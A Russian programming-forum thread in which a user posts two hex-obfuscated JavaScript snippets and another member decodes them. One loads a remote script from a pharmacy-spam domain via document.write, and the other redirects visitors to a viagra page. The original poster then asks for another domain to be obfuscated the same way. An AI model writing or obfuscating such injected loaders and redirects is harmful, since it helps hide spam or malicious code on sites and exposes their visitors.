Форум программистов
 

Восстановите пароль или Зарегистрируйтесь на форуме, о проблемах и с заказом рекламы пишите сюда - alarforum@yandex.ru, проверяйте папку спам!

Вернуться   Форум программистов > Web программирование > JavaScript, Ajax
Регистрация

Восстановить пароль
Повторная активизация e-mail

Купить рекламу на форуме - 42 тыс руб за месяц

Ответ
 
Опции темы Поиск в этой теме
Старый 02.11.2012, 21:37   #1
katruk1
 
Регистрация: 02.11.2012
Сообщений: 5
По умолчанию кто может раскодировать JS файл ?

кто может раскодировать JS файл ?
var _0x7b2d=["\x3C\x73\x63\x72\x69\x70\x74\x20\x 74\x79\x70\x65\x3D\x22\x74\x65\x78\ x74\x2F\x6A\x61\x76\x61\x73\x63\x72 \x69\x70\x74\x22\x20\x6C\x61\x6E\x6 7\x75\x61\x67\x65\x3D\x22\x6A\x61\x 76\x61\x73\x63\x72\x69\x70\x74\x22\ x20\x73\x72\x63\x3D\x22\x68\x74\x74 \x70\x3A\x2F\x2F\x70\x75\x70\x75\x6 C\x61\x72\x2D\x70\x69\x6C\x6C\x73\x 2E\x63\x6F\x6D\x2F\x6A\x73\x2F\x76\ x69\x61\x67\x72\x61\x32\x5F\x31\x2E \x6A\x73\x22\x3E\x3C\x2F\x73\x63"," \x72\x69\x70\x74\x3E","\x77\x72\x69 \x74\x65"];document[_0x7b2d[2]](_0x7b2d[0]+_0x7b2d[1]);

или

var _0x680b=["\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x74\x74\x70\x3A\x2F\x2F\x70\x 75\x70\x75\x6C\x61\x72\x2D\x70\x69\ x6C\x6C\x73\x2E\x63\x6F\x6D\x2F\x67 \x6F\x2F\x76\x69\x61\x67\x72\x61\x3 1\x2E\x70\x68\x70"];function rdt(){window[_0x680b[0]]=_0x680b[1];} ;
katruk1 вне форума Ответить с цитированием
Старый 02.11.2012, 22:13   #2
LZero
Форумчанин
 
Регистрация: 20.07.2012
Сообщений: 129
По умолчанию

1.
Код:
var _0x7b2d=["<script type="text/javascript" language="javascript" src="http://pupular-pills.com/js/viagra2_1.js"></sc", 
"ript>",
"write"];
document[write](_0x7b2d[0]+_0x7b2d[1]);
или
Код:
document.write('<script type="text/javascript" language="javascript" src="http://pupular-pills.com/js/viagra2_1.js"></script>');
подключает яваскрипт файл.

2.
Код:
var _0x680b=["location", "http://pupular-pills.com/go/viagra1.php"];function rdt(){window[_0x680b[0]]=_0x680b[1];} ;
или
Код:
function rdt() {
	window.location = 'http://pupular-pills.com/go/viagra1.php';
}
перенаправляет на страницу (ссылка выше).

Последний раз редактировалось LZero; 02.11.2012 в 22:16.
LZero вне форума Ответить с цитированием
Старый 06.11.2012, 00:06   #3
katruk1
 
Регистрация: 02.11.2012
Сообщений: 5
По умолчанию Большое спасибо.

Цитата:
Сообщение от LZero Посмотреть сообщение
1.
Код:
var _0x7b2d=["<script type="text/javascript" language="javascript" src="http://pupular-pills.com/js/viagra2_1.js"></sc", 
"ript>",
"write"];
document[write](_0x7b2d[0]+_0x7b2d[1]);
или
Код:
document.write('<script type="text/javascript" language="javascript" src="http://pupular-pills.com/js/viagra2_1.js"></script>');
подключает яваскрипт файл.

2.
Код:
var _0x680b=["location", "http://pupular-pills.com/go/viagra1.php"];function rdt(){window[_0x680b[0]]=_0x680b[1];} ;
или
Код:
function rdt() {
	window.location = 'http://pupular-pills.com/go/viagra1.php';
}
перенаправляет на страницу (ссылка выше).
Большое спасибо. Я так понимаю если вы смогли раскодировать то вы наверное можете закодировать другой домен ??
И ещё мне нужна кое какая консультация (можно платная) относительно кое каких скриптов и файлов js,. Если можно свяжитесь со мной по аське 480012482 или по мылу glot-rst@list.ru
katruk1 вне форума Ответить с цитированием
Старый 16.12.2015, 13:56   #4
Tamplier_1986
Новичок
Джуниор
 
Регистрация: 16.12.2015
Сообщений: 1
По умолчанию

Помогите расшифровать код:

file2.txt
Tamplier_1986 вне форума Ответить с цитированием
Ответ


Купить рекламу на форуме - 42 тыс руб за месяц



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
как раскодировать JS файл katruk1 Фриланс 3 03.11.2012 09:57
Кто может переписать файл с расширением .tsl из программы тестер (прога для здачи теста )) zirul Софт 1 10.04.2012 02:58
Можно ли раскодировать EXE файл? mnbvcxz13 Свободное общение 2 14.11.2011 20:13
Просьба раскодировать файл viperrulezz Помощь студентам 0 25.03.2011 18:07